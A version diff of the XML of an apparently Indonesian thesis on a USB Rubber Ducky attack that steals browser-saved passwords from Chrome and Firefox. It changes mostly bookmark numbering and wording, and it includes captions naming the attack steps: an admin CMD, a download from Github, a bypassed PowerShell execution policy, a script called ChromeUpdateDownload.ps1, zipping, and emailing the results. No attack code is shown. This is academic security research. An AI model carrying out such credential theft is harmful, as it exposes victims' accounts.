+      <w:bookmarkStart w:id="38" w:name="_Toc43087406"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -11446,7 +12952,7 @@
         <w:lastRenderedPageBreak/>
         <w:t>Password Attack</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="39"/>
+      <w:bookmarkEnd w:id="38"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -11722,14 +13228,14 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="40" w:name="_Toc43087407"/>
+      <w:bookmarkStart w:id="39" w:name="_Toc43087407"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
         </w:rPr>
         <w:t>Nirsoft.net</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="40"/>
+      <w:bookmarkEnd w:id="39"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -11998,14 +13504,14 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="41" w:name="_Toc43087408"/>
+      <w:bookmarkStart w:id="40" w:name="_Toc43087408"/>
       <w:r>
         <w:t xml:space="preserve">Microsoft </w:t>
       </w:r>
       <w:r>
         <w:t>Powershell</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="41"/>
+      <w:bookmarkEnd w:id="40"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -12286,11 +13792,11 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="42" w:name="_Toc43087409"/>
+      <w:bookmarkStart w:id="41" w:name="_Toc43087409"/>
       <w:r>
         <w:t>Sistem Operasi</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="42"/>
+      <w:bookmarkEnd w:id="41"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -12450,7 +13956,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="43" w:name="_Toc43087410"/>
+      <w:bookmarkStart w:id="42" w:name="_Toc43087410"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -12460,7 +13966,7 @@
       <w:r>
         <w:t xml:space="preserve"> (USB)</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="43"/>
+      <w:bookmarkEnd w:id="42"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -12711,11 +14217,11 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="44" w:name="_Toc43087411"/>
+      <w:bookmarkStart w:id="43" w:name="_Toc43087411"/>
       <w:r>
         <w:t>USB Rubber Ducky</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="44"/>
+      <w:bookmarkEnd w:id="43"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -13337,11 +14843,11 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="45" w:name="_Toc43087412"/>
+      <w:bookmarkStart w:id="44" w:name="_Toc43087412"/>
       <w:r>
         <w:t>Perbandingan dengan penelitian sebelumnya</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="45"/>
+      <w:bookmarkEnd w:id="44"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -13351,7 +14857,7 @@
           <w:b w:val="0"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="46" w:name="_Toc26430686"/>
+      <w:bookmarkStart w:id="45" w:name="_Toc26430686"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -13395,7 +14901,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> Perbandingan penelitian sebelumnya</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="46"/>
+      <w:bookmarkEnd w:id="45"/>
     </w:p>
     <w:tbl>
       <w:tblPr>
@@ -13817,14 +15323,14 @@
         <w:pStyle w:val="Heading1"/>
         <w:ind w:hanging="142"/>
       </w:pPr>
-      <w:bookmarkStart w:id="47" w:name="_Toc43087413"/>
+      <w:bookmarkStart w:id="46" w:name="_Toc43087413"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Metodologi Penelitian</w:t>
       </w:r>
-      <w:bookmarkStart w:id="48" w:name="_Toc75146113"/>
-      <w:bookmarkStart w:id="49" w:name="_Toc463344429"/>
-      <w:bookmarkEnd w:id="47"/>
+      <w:bookmarkStart w:id="47" w:name="_Toc75146113"/>
+      <w:bookmarkStart w:id="48" w:name="_Toc463344429"/>
+      <w:bookmarkEnd w:id="46"/>
     </w:p>
     <w:p/>
     <w:p>
@@ -13837,11 +15343,11 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="50" w:name="_Toc43087414"/>
+      <w:bookmarkStart w:id="49" w:name="_Toc43087414"/>
       <w:r>
         <w:t>Metode Konseptual</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="50"/>
+      <w:bookmarkEnd w:id="49"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -13931,7 +15437,7 @@
           <w:bCs w:val="0"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="51" w:name="_Toc43087913"/>
+      <w:bookmarkStart w:id="50" w:name="_Toc43087913"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -13983,7 +15489,7 @@
         </w:rPr>
         <w:t>. Metode Konseptual</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="51"/>
+      <w:bookmarkEnd w:id="50"/>
     </w:p>
     <w:p/>
     <w:p>
@@ -13995,7 +15501,7 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="52" w:name="_Toc43087415"/>
+      <w:bookmarkStart w:id="51" w:name="_Toc43087415"/>
       <w:r>
         <w:rPr>
           <w:bCs w:val="0"/>
@@ -14016,7 +15522,7 @@
         </w:rPr>
         <w:t>Penelitian</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="52"/>
+      <w:bookmarkEnd w:id="51"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -14059,7 +15565,7 @@
             <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
             <o:lock v:ext="edit" aspectratio="t"/>
           </v:shapetype>
-          <v:shape id="_x0000_i1095" type="#_x0000_t75" style="width:191.3pt;height:635.1pt">
+          <v:shape id="_x0000_i1154" type="#_x0000_t75" style="width:191.3pt;height:635.1pt">
             <v:imagedata r:id="rId14" o:title="Sistematika Penelitian"/>
           </v:shape>
         </w:pict>
@@ -14074,7 +15580,7 @@
           <w:bCs w:val="0"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="53" w:name="_Toc43087914"/>
+      <w:bookmarkStart w:id="52" w:name="_Toc43087914"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -14126,7 +15632,7 @@
         </w:rPr>
         <w:t>. Sistematika Penelitian</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="53"/>
+      <w:bookmarkEnd w:id="52"/>
     </w:p>
     <w:p/>
     <w:p>
@@ -14141,7 +15647,7 @@
           <w:bCs w:val="0"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="54" w:name="_Toc43087416"/>
+      <w:bookmarkStart w:id="53" w:name="_Toc43087416"/>
       <w:r>
         <w:rPr>
           <w:bCs w:val="0"/>
@@ -14149,7 +15655,7 @@
         <w:lastRenderedPageBreak/>
         <w:t>Inisiasi</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="54"/>
+      <w:bookmarkEnd w:id="53"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -14178,14 +15684,14 @@
           <w:bCs w:val="0"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="55" w:name="_Toc43087417"/>
+      <w:bookmarkStart w:id="54" w:name="_Toc43087417"/>
       <w:r>
         <w:rPr>
           <w:bCs w:val="0"/>
         </w:rPr>
         <w:t>Hipotesis</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="55"/>
+      <w:bookmarkEnd w:id="54"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -14214,14 +15720,14 @@
           <w:bCs w:val="0"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="56" w:name="_Toc43087418"/>
+      <w:bookmarkStart w:id="55" w:name="_Toc43087418"/>
       <w:r>
         <w:rPr>
           <w:bCs w:val="0"/>
         </w:rPr>
         <w:t>Simulasi</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="56"/>
+      <w:bookmarkEnd w:id="55"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -14377,14 +15883,14 @@
           <w:bCs w:val="0"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="57" w:name="_Toc43087419"/>
+      <w:bookmarkStart w:id="56" w:name="_Toc43087419"/>
       <w:r>
         <w:rPr>
           <w:bCs w:val="0"/>
         </w:rPr>
         <w:t>Akhir</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="57"/>
+      <w:bookmarkEnd w:id="56"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -14428,7 +15934,7 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="58" w:name="_Toc43087420"/>
+      <w:bookmarkStart w:id="57" w:name="_Toc43087420"/>
       <w:r>
         <w:rPr>
           <w:bCs w:val="0"/>
@@ -14438,7 +15944,7 @@
         <w:lastRenderedPageBreak/>
         <w:t>Pelaporan</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="58"/>
+      <w:bookmarkEnd w:id="57"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -14458,31 +15964,73 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="59" w:name="_Toc43087421"/>
-      <w:r>
+      <w:bookmarkStart w:id="58" w:name="_Toc43087421"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>PERANCANGAN SISTEM DAN SKENARIO PENYERANGAN</w:t>
+        <w:t>P</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">erancangan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>S</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">istem </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>D</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">an </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>S</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">kenario </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>P</w:t>
+      </w:r>
+      <w:r>
+        <w:t>enyerangan</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="58"/>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="59" w:name="_Toc43087422"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Perancangan Sistem</w:t>
       </w:r>
       <w:bookmarkEnd w:id="59"/>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:rPr>
-          <w:bCs w:val="0"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="60" w:name="_Toc43087422"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs w:val="0"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>Perancangan Sistem</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="60"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -14579,9 +16127,9 @@
           <w:bCs w:val="0"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="61" w:name="_Toc43087604"/>
-      <w:bookmarkStart w:id="62" w:name="_Toc43087898"/>
-      <w:bookmarkStart w:id="63" w:name="_Toc43087978"/>
+      <w:bookmarkStart w:id="60" w:name="_Toc43087604"/>
+      <w:bookmarkStart w:id="61" w:name="_Toc43087898"/>
+      <w:bookmarkStart w:id="62" w:name="_Toc43194834"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -14633,9 +16181,9 @@
         </w:rPr>
         <w:t>. Ilustrasi Penyerangan</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="60"/>
       <w:bookmarkEnd w:id="61"/>
       <w:bookmarkEnd w:id="62"/>
-      <w:bookmarkEnd w:id="63"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -14864,8 +16412,8 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="64" w:name="_Toc43089946"/>
-      <w:bookmarkStart w:id="65" w:name="_Toc43089989"/>
+      <w:bookmarkStart w:id="63" w:name="_Toc43089946"/>
+      <w:bookmarkStart w:id="64" w:name="_Toc43089989"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -14927,8 +16475,8 @@
         </w:rPr>
         <w:t>Harware</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="63"/>
       <w:bookmarkEnd w:id="64"/>
-      <w:bookmarkEnd w:id="65"/>
     </w:p>
     <w:tbl>
       <w:tblPr>
@@ -15645,8 +17193,8 @@
           <w:bCs w:val="0"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="66" w:name="_Toc43089947"/>
-      <w:bookmarkStart w:id="67" w:name="_Toc43089990"/>
+      <w:bookmarkStart w:id="65" w:name="_Toc43089947"/>
+      <w:bookmarkStart w:id="66" w:name="_Toc43089990"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -15708,8 +17256,8 @@
         </w:rPr>
         <w:t>Software</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="65"/>
       <w:bookmarkEnd w:id="66"/>
-      <w:bookmarkEnd w:id="67"/>
     </w:p>
     <w:tbl>
       <w:tblPr>
@@ -16583,7 +18131,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="68" w:name="_Toc43087423"/>
+      <w:bookmarkStart w:id="67" w:name="_Toc43087423"/>
       <w:r>
         <w:rPr>
           <w:bCs w:val="0"/>
@@ -16591,7 +18139,7 @@
         </w:rPr>
         <w:t>Mekanisme Penyerangan</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="68"/>
+      <w:bookmarkEnd w:id="67"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -16605,7 +18153,25 @@
         <w:rPr>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t xml:space="preserve">Mekanisme pada penelitian ini terbagi dalam </w:t>
+        <w:t>Secara garis besar, m</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>ekanisme</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> penyerangan</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> pada penelitian ini terbagi dalam </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -16917,7 +18483,43 @@
         <w:rPr>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t>Gambar IV-2 berikut menjelaskan alur penyerangan yang lebih detail dari awal hingga akhir.</w:t>
+        <w:t xml:space="preserve">Berdasarkan empat proses diatas, penjelasan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">alur penyerangan yang lebih </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>rinci</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> dari awal hingga akhir</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ditampilkan pada </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Gambar IV-2 berikut.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -16994,9 +18596,9 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="69" w:name="_Toc43087605"/>
-      <w:bookmarkStart w:id="70" w:name="_Toc43087899"/>
-      <w:bookmarkStart w:id="71" w:name="_Toc43087979"/>
+      <w:bookmarkStart w:id="68" w:name="_Toc43087605"/>
+      <w:bookmarkStart w:id="69" w:name="_Toc43087899"/>
+      <w:bookmarkStart w:id="70" w:name="_Toc43194835"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -17048,9 +18650,9 @@
         </w:rPr>
         <w:t>. Alur Penyerangan</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="68"/>
       <w:bookmarkEnd w:id="69"/>
       <w:bookmarkEnd w:id="70"/>
-      <w:bookmarkEnd w:id="71"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -17090,8 +18692,8 @@
           <w:bCs w:val="0"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="72" w:name="_Toc43089948"/>
-      <w:bookmarkStart w:id="73" w:name="_Toc43089991"/>
+      <w:bookmarkStart w:id="71" w:name="_Toc43089948"/>
+      <w:bookmarkStart w:id="72" w:name="_Toc43089991"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -17144,8 +18746,8 @@
         </w:rPr>
         <w:t>. Kerentanan dan Ancaman</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="71"/>
       <w:bookmarkEnd w:id="72"/>
-      <w:bookmarkEnd w:id="73"/>
     </w:p>
     <w:tbl>
       <w:tblPr>
@@ -17972,7 +19574,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="74" w:name="_Toc43087424"/>
+      <w:bookmarkStart w:id="73" w:name="_Toc43087424"/>
       <w:r>
         <w:rPr>
           <w:bCs w:val="0"/>
@@ -17980,7 +19582,7 @@
         </w:rPr>
         <w:t>Pengembangan Sistem</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="74"/>
+      <w:bookmarkEnd w:id="73"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -18028,7 +19630,19 @@
         <w:rPr>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t>pada Google Chrome dan Mozilla Firefox.</w:t>
+        <w:t>pada Google Chrome dan Mozilla Firefox</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> berdasarkan alur yang telah ditunjukkan pada Gambar IV-2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -23249,9 +24863,9 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="75" w:name="_Toc43087606"/>
-      <w:bookmarkStart w:id="76" w:name="_Toc43087900"/>
-      <w:bookmarkStart w:id="77" w:name="_Toc43087980"/>
+      <w:bookmarkStart w:id="74" w:name="_Toc43087606"/>
+      <w:bookmarkStart w:id="75" w:name="_Toc43087900"/>
+      <w:bookmarkStart w:id="76" w:name="_Toc43194836"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -23313,9 +24927,9 @@
         </w:rPr>
         <w:t>Ducky Script</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="74"/>
       <w:bookmarkEnd w:id="75"/>
       <w:bookmarkEnd w:id="76"/>
-      <w:bookmarkEnd w:id="77"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -24054,9 +25668,9 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="78" w:name="_Toc43087607"/>
-      <w:bookmarkStart w:id="79" w:name="_Toc43087901"/>
-      <w:bookmarkStart w:id="80" w:name="_Toc43087981"/>
+      <w:bookmarkStart w:id="77" w:name="_Toc43087607"/>
+      <w:bookmarkStart w:id="78" w:name="_Toc43087901"/>
+      <w:bookmarkStart w:id="79" w:name="_Toc43194837"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -24108,9 +25722,9 @@
         </w:rPr>
         <w:t>. Baris perintah membuka CMD sebagai admin</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="77"/>
       <w:bookmarkEnd w:id="78"/>
       <w:bookmarkEnd w:id="79"/>
-      <w:bookmarkEnd w:id="80"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -24610,9 +26224,9 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="81" w:name="_Toc43087608"/>
-      <w:bookmarkStart w:id="82" w:name="_Toc43087902"/>
-      <w:bookmarkStart w:id="83" w:name="_Toc43087982"/>
+      <w:bookmarkStart w:id="80" w:name="_Toc43087608"/>
+      <w:bookmarkStart w:id="81" w:name="_Toc43087902"/>
+      <w:bookmarkStart w:id="82" w:name="_Toc43194838"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -24681,9 +26295,9 @@
         </w:rPr>
         <w:t>untuk Membuat Folder</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="80"/>
       <w:bookmarkEnd w:id="81"/>
       <w:bookmarkEnd w:id="82"/>
-      <w:bookmarkEnd w:id="83"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -25019,9 +26633,9 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="84" w:name="_Toc43087609"/>
-      <w:bookmarkStart w:id="85" w:name="_Toc43087903"/>
-      <w:bookmarkStart w:id="86" w:name="_Toc43087983"/>
+      <w:bookmarkStart w:id="83" w:name="_Toc43087609"/>
+      <w:bookmarkStart w:id="84" w:name="_Toc43087903"/>
+      <w:bookmarkStart w:id="85" w:name="_Toc43194839"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -25073,9 +26687,9 @@
         </w:rPr>
         <w:t>. Baris Perintah untuk Mengunduh File dari Github</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="83"/>
       <w:bookmarkEnd w:id="84"/>
       <w:bookmarkEnd w:id="85"/>
-      <w:bookmarkEnd w:id="86"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -25646,9 +27260,9 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="87" w:name="_Toc43087610"/>
-      <w:bookmarkStart w:id="88" w:name="_Toc43087904"/>
-      <w:bookmarkStart w:id="89" w:name="_Toc43087984"/>
+      <w:bookmarkStart w:id="86" w:name="_Toc43087610"/>
+      <w:bookmarkStart w:id="87" w:name="_Toc43087904"/>
+      <w:bookmarkStart w:id="88" w:name="_Toc43194840"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -25726,9 +27340,9 @@
         </w:rPr>
         <w:t>Execution Policy</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="86"/>
       <w:bookmarkEnd w:id="87"/>
       <w:bookmarkEnd w:id="88"/>
-      <w:bookmarkEnd w:id="89"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -26316,9 +27930,9 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="90" w:name="_Toc43087611"/>
-      <w:bookmarkStart w:id="91" w:name="_Toc43087905"/>
-      <w:bookmarkStart w:id="92" w:name="_Toc43087985"/>
+      <w:bookmarkStart w:id="89" w:name="_Toc43087611"/>
+      <w:bookmarkStart w:id="90" w:name="_Toc43087905"/>
+      <w:bookmarkStart w:id="91" w:name="_Toc43194841"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -26381,9 +27995,9 @@
         </w:rPr>
         <w:t>Tools</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="89"/>
       <w:bookmarkEnd w:id="90"/>
       <w:bookmarkEnd w:id="91"/>
-      <w:bookmarkEnd w:id="92"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -27143,9 +28757,9 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="93" w:name="_Toc43087612"/>
-      <w:bookmarkStart w:id="94" w:name="_Toc43087906"/>
-      <w:bookmarkStart w:id="95" w:name="_Toc43087986"/>
+      <w:bookmarkStart w:id="92" w:name="_Toc43087612"/>
+      <w:bookmarkStart w:id="93" w:name="_Toc43087906"/>
+      <w:bookmarkStart w:id="94" w:name="_Toc43194842"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -27197,7 +28811,7 @@
         </w:rPr>
         <w:t xml:space="preserve">. Baris Perintah untuk </w:t>
       </w:r>
-      <w:bookmarkEnd w:id="93"/>
+      <w:bookmarkEnd w:id="92"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -27226,8 +28840,8 @@
         </w:rPr>
         <w:t>Email</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="93"/>
       <w:bookmarkEnd w:id="94"/>
-      <w:bookmarkEnd w:id="95"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -27841,9 +29455,9 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="96" w:name="_Toc43087613"/>
-      <w:bookmarkStart w:id="97" w:name="_Toc43087907"/>
-      <w:bookmarkStart w:id="98" w:name="_Toc43087987"/>
+      <w:bookmarkStart w:id="95" w:name="_Toc43087613"/>
+      <w:bookmarkStart w:id="96" w:name="_Toc43087907"/>
+      <w:bookmarkStart w:id="97" w:name="_Toc43194843"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -27905,9 +29519,9 @@
         </w:rPr>
         <w:t>Script</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="95"/>
       <w:bookmarkEnd w:id="96"/>
       <w:bookmarkEnd w:id="97"/>
-      <w:bookmarkEnd w:id="98"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -28277,9 +29891,9 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="99" w:name="_Toc43087614"/>
-      <w:bookmarkStart w:id="100" w:name="_Toc43087908"/>
-      <w:bookmarkStart w:id="101" w:name="_Toc43087988"/>
+      <w:bookmarkStart w:id="98" w:name="_Toc43087614"/>
+      <w:bookmarkStart w:id="99" w:name="_Toc43087908"/>
+      <w:bookmarkStart w:id="100" w:name="_Toc43194844"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -28349,9 +29963,9 @@
         </w:rPr>
         <w:t>ChromeUpdateDownload.ps1</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="98"/>
       <w:bookmarkEnd w:id="99"/>
       <w:bookmarkEnd w:id="100"/>
-      <w:bookmarkEnd w:id="101"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -28813,9 +30427,9 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="102" w:name="_Toc43087615"/>
-      <w:bookmarkStart w:id="103" w:name="_Toc43087909"/>
-      <w:bookmarkStart w:id="104" w:name="_Toc43087989"/>
+      <w:bookmarkStart w:id="101" w:name="_Toc43087615"/>
+      <w:bookmarkStart w:id="102" w:name="_Toc43087909"/>
+      <w:bookmarkStart w:id="103" w:name="_Toc43194845"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -28885,9 +30499,9 @@
         </w:rPr>
         <w:t xml:space="preserve"> zipping.ps1</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="101"/>
       <w:bookmarkEnd w:id="102"/>
       <w:bookmarkEnd w:id="103"/>
-      <w:bookmarkEnd w:id="104"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -29076,9 +30690,9 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="105" w:name="_Toc43087616"/>
-      <w:bookmarkStart w:id="106" w:name="_Toc43087910"/>
-      <w:bookmarkStart w:id="107" w:name="_Toc43087990"/>
+      <w:bookmarkStart w:id="104" w:name="_Toc43087616"/>
+      <w:bookmarkStart w:id="105" w:name="_Toc43087910"/>
+      <w:bookmarkStart w:id="106" w:name="_Toc43194846"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -29166,9 +30780,9 @@
         </w:rPr>
